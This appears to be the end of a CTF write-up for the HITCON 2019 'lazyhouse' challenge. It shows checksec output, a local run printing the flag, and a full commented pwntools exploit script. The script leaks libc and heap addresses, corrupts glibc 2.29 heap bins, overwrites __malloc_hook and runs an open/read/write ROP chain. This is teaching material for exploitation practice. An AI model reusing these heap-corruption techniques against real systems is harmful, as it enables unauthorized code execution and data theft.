[*] '/ctf/CTF-archive/hitcon-2019/lazyhouse/lazyhouse'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
[*] '/ctf/CTF-archive/hitcon-2019/lazyhouse/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
LOCAL PROCESS
[+] Starting local process './lazyhouse': pid 3853
[*] Libc base: 0x7ff02a349000
[*] Heap base: 0x559a1966b000
[*] Switching to interactive mode
Price:5415557892635423262
hitconctf{congrats}\x00\x00\x00\x00\x00\x00\x00\x00

Full exploit script

My exploit script isn’t exactly Balsn’s exploit script. I modified it in some places, and also removed some stuff that wasn’t required for the exploit to function. Overall, I hope this writeup and the comments on the script help people understand how the exploit works, because it truly is amazing.

Big shoutout to Balsn for releasing the exploit script. I had lots of fun analysing it.

#!/usr/bin/env python2

from pwn import *

BINARY = './lazyhouse'
HOST, PORT = '3.115.121.123', 5731

elf = ELF('./lazyhouse')
libc = ELF('./libc.so.6')

def start():
  if not args.REMOTE:
    print "LOCAL PROCESS"
    return process(BINARY)
  else:
    print "REMOTE PROCESS"
    return remote(HOST, PORT)

def get_base_address(proc):
  return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)

def debug(breakpoints):
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in breakpoints:
        script += "b *0x%x\n"%(PIE+bp)
    gdb.attach(p,gdbscript=script)

def buy(idx, size, content):
  p.sendlineafter(': ', '1')
  p.sendlineafter(':', str(idx))
  p.sendlineafter(':', str(size))
  p.sendafter(':', content)

def show(idx):
  p.sendlineafter(': ', '2')
  p.sendlineafter(':', str(idx))

def sell(idx):
  p.sendlineafter(': ', '3')
  p.sendlineafter(':', str(idx))

def upgrade(idx, content):
  p.sendlineafter(': ', '4')
  p.sendlineafter(':', str(idx))
  p.sendafter(':', content)

def super_house(content):
  p.sendlineafter(': ', '5')
  p.sendafter(':', content)

context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']

p = start()

if args.GDB:
  debug([])

def get_money():
  payload = ((2**64-1)/218)+1

  p.sendlineafter(': ', '1')
  p.sendlineafter(':', '0')
  p.sendlineafter(':', str(payload))

  sell(0)

get_money()

buy(0, 0x80, 'A'*0x80) # Used to overwrite into chunk B
buy(1, 0x500, 'B'*0x500) # Chunk B
buy(2, 0x80, 'C'*0x80) # Prevent consolidation with top chunk

# Sell chunk B into unsorted bin
sell(1)
buy(1, 0x600, 'A'*0x600) # Move chunk B to large bin

# Overflow to turn on the IS_MMAPPED bit of chunk B
# This prevents calloc from clearing the chunk when we reallocate it
upgrade(0, '\x00'*0x88 + p64(0x513))

# Get chunk B back without it being zeroed out
buy(7, 0x500, 'A'*8)

# Leak libc and heap addresses
show(7)
data = p.recv(0x18)

libc.address = u64(data[8:16]) - 0x1e50d0
heap = u64(data[16:24]) - 0x2e0

pop_rdi = libc.address + 0x26542
pop_rsi = libc.address + 0x26f9e
pop_rdx = libc.address + 0x12bda6
pop_rax = libc.address + 0x47cf8
syscall = libc.address + 0xcf6c5
malloc_hook = libc.symbols['__malloc_hook']
leave_ret = libc.address + 0x58373

log.info('Libc base: ' + hex(libc.address))
log.info('Heap base: ' + hex(heap))

# Clear indexes 0, 1, and 2
sell(0) # goes into tcache 0x80
sell(1) # merges with top chunk
sell(2) # goes into tcache 0x80

# Create a fake 0x230 sized chunk within a new chunk
# The target address is used to pass the unlink_chunk checks in libc 2.29
target = heap + 0x890
buy(6, 0x80, '\x00'*8 + p64(0x231)+p64(target+8)+p64(target+0x10)+p64(target))

# Create enough chunks to create a 0x230 sized gap between the fake 0x230 chunk above
# and the 0x600 sized chunk below that we will consolidate backwards
buy(5, 0x80, 'C'*0x80)
buy(0, 0x80, 'D'*0x80)
buy(1, 0x80, 'E'*0x80)

# This chunk will be freed to consolidate backwards
buy(2, 0x600, '\x00'*0x600)

# Set prev size to go back to the fake 0x230 chunk
# Clear prev inuse bit of the 0x600 sized chunk
upgrade(1, '\x00'*0x80 + p64(0x230) + p64(0x610))

# 0x600 chunk will now be freed and consolidated back to the fake 0x230 sized chunk
# Top chunk is right after this, so top chunk is consolidated all the way back too
sell(2)

# Index 5 will be the 0x6c1 sized fake chunk in the payload
# Index 0 will be the 0x31 sized chunk
# Index 1 will be the 0x21 sized chunk
payload = '\x00'*0x78 + p64(0x6c1) # Index 5
payload += p64(0)*17 + p64(0x31) # Index 0
payload += p64(0)*17 + p64(0x21) # Index 1
payload += p64(0)*15
buy(2, 0x500, payload)

# We put pointers to these chunks into the tcache_perthread_struct now
# This is required later when we do the small bin unlink attack
sell(0) # Free 0x30 sized chunk
sell(1) # Free 0x20 sized chunk

# Consolidate backwards again
# Any new allocations following this will allow us to overwrite the metadata of any
# of the chunks from above
sell(2)

# We create a chunk to go right up to the 0x20 sized chunk's fd and bk
# We must also maintain the 0x6c1 sized fake chunk here as we still have a pointer to it
# We will free the fake 0x6c1 chunk into the unsorted bin later
# It will be used to overwrite the metadata of the fake chunks from above
buy(0, 0x1a0, p64(0)*15+p64(0x6c1))

# This chunk will be right after the 0x20 sized chunk's fd and bk from above
# It will be sent into the small bin
# We will use it to perform a small bin unlink attack later
buy(1, 0x210, 'A'*0x210)

# Just a filler chunk for the next chunk
buy(2, 0x210, 'B'*0x210)
sell(2) # Send to tcache

# We need the fake 0xd1 chunk header here to be able to free the 0x6c1 chunk
# This can be calculated using gdb
buy(2, 0x210, '\x00'*0x148+p64(0xd1))
sell(2) # Send to tcache

# Fill the 0x210 tcache bin
for i in range(5):
  buy(2, 0x210, 'a')
  sell(2)

# We create a fake 0x100 chunk header in the tcache_perthread_struct
# by freeing this chunk
buy(2, 0x3a0, 'A'*0x3a0)
sell(2) # Send to tcache

# Send that initial 0x210 sized chunk into the small bin now
sell(1) # Send it to the unsorted bin
buy(1, 0x220, 'A'*0x210) # Move it to the small bin 

sell(5) # Free the fake 0x6c1 sized chunk into unsorted bin

smallbin = libc.address + 0x1e4eb0
tcache_fake_chunk = heap+0x40 # Fake chunk in the tcache_perthread_struct

payload = '\x00'*0x98 + p64(0x31) # 0x30 sized chunk pointer points here
payload += p64(tcache_fake_chunk) # Overwrite the fd to heapbase+0x40
payload += '\x00'*0x80 + p64(0x221) # 0x30 sized chunk pointer points here
payload += p64(smallbin) + p64(tcache_fake_chunk) # Overwrite fd and bk, corrupt smallbin
buy(5, 0x6b0, payload)

# Put the flag's location string at a known place on the heap
# Using gdb, the flag's location string will be at heapbase+0xa68
payload = 'Z'*0x18
payload += '/home/vagrant/flag'.ljust(0x20, '\x00')

# ROP to open the flag file
# Flag file's file descriptor will be 3
payload += p64(pop_rdi) + p64(heap+0xa68)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rax) + p64(2)
payload += p64(syscall)

# ROP to read the flag file's contents right into heapbase
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)

# ROP to write the contents of heapbase right into stdout
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(1)
payload += p64(syscall)

buy(3, 0x210, payload)

# Overwrite the 0x210 sized chunk tcache bin with pointer to __malloc_hook
buy(2, 0x210, p64(0)*0x20 + p64(malloc_hook))

# Overwrite __malloc_hook with a leave; ret gadget
super_house(p64(leave_ret)) # __mpn_mul_n+83

# rbp is set to rsi before __malloc_hook is called in calloc
# Therefore we pass heap+0xa80 as an argument, as our ROP chain starts at
# heap+0xa88
buy(4, heap+0xa80, 'A')

p.interactive()